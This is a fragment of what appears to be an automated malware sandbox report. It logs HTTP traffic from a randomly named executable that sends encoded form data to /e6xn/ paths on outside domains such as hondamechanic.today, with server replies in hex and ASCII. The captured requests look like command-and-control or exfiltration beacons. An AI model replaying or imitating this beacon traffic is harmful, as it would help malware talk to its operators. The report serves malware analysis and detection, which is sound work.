                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:44.860970020 CET115INData Raw: 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.1049724144.76.75.181806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:47.390741110 CET502OUTGET /e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:47.565624952 CET1286INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:47 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:47.565648079 CET115INData Raw: 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.104972564.190.62.22806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:52.992602110 CET772OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.hondamechanic.today
                                                                                  Referer: http://www.hondamechanic.today/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 6a 34 64 6c 47 69 52 38 49 2b 52 4a 5a 47 47 45 4c 73 41 50 66 79 38 46 2f 6b 30 70 7a 4e 39 42 39 36 37 48 45 7a 46 46 55 38 69 67 57 5a 4c 77 41 55 45 35 30 43 6c 56 70 57 38 77 50 78 54 50 6e 35 53 68 6a 6c 33 51 57 35 6e 6c 6e 71 5a 6b 38 2f 68 6d 4c 41 77 72 31 47 43 44 79 43 45 69 71 4d 62 78 6d 79 76 2b 63 55 4a 56 76 74 4f 61 4e 77 4b 71 49 36 30 4e 56 4c 46 2b 36 70 37 31 6f 61 55 6d 71 35 74 6c 75 64 31 4b 55 64 4f 77 45 6e 6f 53 4b 4a 4a 5a 36 75 32 56 5a 41 34 56 76 37 49 76 76 78 2f 73 38 41 7a 71 31 49 70 67 6c 45 6e 6f 62 71 32 34 37 70 4d 38
                                                                                  Data Ascii: bvOt=j4dlGiR8I+RJZGGELsAPfy8F/k0pzN9B967HEzFFU8igWZLwAUE50ClVpW8wPxTPn5Shjl3QW5nlnqZk8/hmLAwr1GCDyCEiqMbxmyv+cUJVvtOaNwKqI60NVLF+6p71oaUmq5tlud1KUdOwEnoSKJJZ6u2VZA4Vv7Ivvx/s8Azq1IpglEnobq247pM8
                                                                                  Mar 18, 2024 14:46:53.167927027 CET701INHTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 18 Mar 2024 13:46:53 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: NginX
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.104972664.190.62.22806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:55.688066006 CET796OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.hondamechanic.today
                                                                                  Referer: http://www.hondamechanic.today/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 6a 34 64 6c 47 69 52 38 49 2b 52 4a 4c 32 32 45 4a 50 59 50 64 53 38 47 36 6b 30 70 39 74 39 4e 39 36 48 48 45 33 31 56 55 50 57 67 59 59 37 77 52 6d 73 35 34 69 6c 56 38 6d 38 78 51 68 53 44 6e 35 57 70 6a 6c 37 51 57 35 7a 6c 6e 72 70 6b 38 4d 5a 35 45 77 77 6c 73 57 43 46 74 53 45 69 71 4d 62 78 6d 79 72 48 63 53 68 56 76 63 2b 61 4b 6c 6d 70 57 71 30 4f 46 62 46 2b 74 35 37 78 6f 61 55 55 71 39 4d 49 75 62 70 4b 55 5a 43 77 4b 57 6f 54 45 4a 4a 66 33 4f 33 53 61 77 46 34 71 37 38 7a 69 53 33 62 69 78 7a 54 79 70 49 6e 30 56 47 2f 49 64 71 32 31 76 35 57 69 61 2f 49 72 79 70 69 35 51 72 46 50 4b 6d 51 74 61 47 76 6c 77 3d 3d
                                                                                  Data Ascii: bvOt=j4dlGiR8I+RJL22EJPYPdS8G6k0p9t9N96HHE31VUPWgYY7wRms54ilV8m8xQhSDn5Wpjl7QW5zlnrpk8MZ5EwwlsWCFtSEiqMbxmyrHcShVvc+aKlmpWq0OFbF+t57xoaUUq9MIubpKUZCwKWoTEJJf3O3SawF4q78ziS3bixzTypIn0VG/Idq21v5Wia/Irypi5QrFPKmQtaGvlw==
                                                                                  Mar 18, 2024 14:46:55.863796949 CET701INHTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 18 Mar 2024 13:46:55 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: NginX
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.104972764.190.62.22806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:58.392365932 CET1809OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.hondamechanic.today
                                                                                  Referer: http://www.hondamechanic.today/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 6a 34 64 6c 47 69 52 38 49 2b 52 4a 4c 32 32 45 4a 50 59 50 64 53 38 47 36 6b 30 70 39 74 39 4e 39 36 48 48 45 33 31 56 55 4f 75 67 59 71 7a 77 41 33 73 35 35 69 6c 56 67 32 38 30 51 68 54 5a 6e 35 75 74 6a 6b 48 6d 57 38 33 6c 31 64 64 6b 2b 39 5a 35 54 41 77 6c 78 47 43 41 79 43 45 33 71 4d 4c 31 6d 79 37 48 63 53 68 56 76 65 6d 61 5a 51 4b 70 55 71 30 4e 56 4c 46 36 36 70 37 5a 6f 65 41 45 71 38 4d 2b 74 74 5a 4b 56 35 53 77 47 45 41 54 49 4a 4a 64 35 75 33 77 61 77 4a 37 71 37 67 56 69 52 72 68 69 33 44 54 32 4d 70 6a 7a 78 32 62 53 2f 4b 75 71 66 78 79 71 66 58 63 76 32 6f 62 31 51 72 51 54 49 7a 68 6a 59 4c 42 32 4c 71 48 5a 4d 67 72 6d 53 30 37 55 74 7a 4c 63 2f 58 73 6b 4a 32 68 63 51 62 4a 64 71 39 32 39 42 38 6f 61 38 65 73 59 49 37 57 6c 46 66 72 72 65 74 48 61 72 6d 38 62 71 77 48 54 53 50 70 64 41 5a 70 64 74 75 4f 45 2b 53 72 64 5a 4f 6a 67 49 71 4e 57 4a 2f 6a 61 46 63 69 77 62 2f 4d 32 57 58 2b 30 56 64 49 37 37 54 4a 41 32 30 54 67 36 77 61 46 50 6f 74 71 51 4e 72 31 58 4d 35 78 4a 59 35 79 48 38 74 78 47 46 6a 62 4b 5a 72 62 77 64 4d 4c 64 4d 4b 38 53 51 5a 30 36 49 79 77 59 5a 4e 56 77 66 46 79 6d 6f 43 59 4a 4f 4e 32 67 4d 73 4b 51 72 5a 54 47 69 74 71 37 43 30 6a 76 78 30 5a 6a 41 6b 75 56 43 35 4f 76 37 70 34 79 35 32 39 74 4f 61 68 41 42 30 31 63 48 6f 50 79 7a 6a 62 42 53 66 56 74 38 49 5a 35 37 73 53 63 48 32 77 6a 43 2b 41 4a 77 72 6f 52 71 4b 30 65 61 52 72 62 43 51 4c 63 4f 79 6c 4b 4b 53 4c 64 47 4a 46 44 2f 6c 61 62 37 77 51 77 6f 77 6f 4f 71 6a 73 63 51 78 34 72 67 71 44 54 2b 37 70 63 6c 32 48 70 66 72 61 51 30 6e 57 59 7a 51 42 56 4c 6e 62 35 44 35 30 71 71 4b 66 71 37 79 73 4d 55 59 47 6a 73 35 75 69 39 6d 41 65 6f 59 76 54 37 35 77 33 36 69 6f 64 66 74 75 51 57 55 38 4d 78 49 2b 78 2f 46 65 34 39 74 38 66 4c 68 68 4c 52 55 47 32 73 34 53 46 43 76 59 67 43 6f 49 76 4f 58 53 58 2f 43 71 4c 4e 65 4e 41 76 62 7a 70 79 31 33 74 65 78 73 64 4c 4a 5a 59 52 4d 65 46 65 67 6b 63 46 32 6e 46 6d 31 69 56 41 32 66 4c 53 4d 59 39 32 51 65 56 53 42 46 48 42 36 4c 33 72 33 62 50 6c 30 32 7a 76 74 7a 71 33 4b 45 4c 74 49 69 56 32 47 61 33 67 6c 62 5a 73 4b 6e 65 45 6b 54 58 48 78 73 5a 2b 46 70 78 4f 4b 38 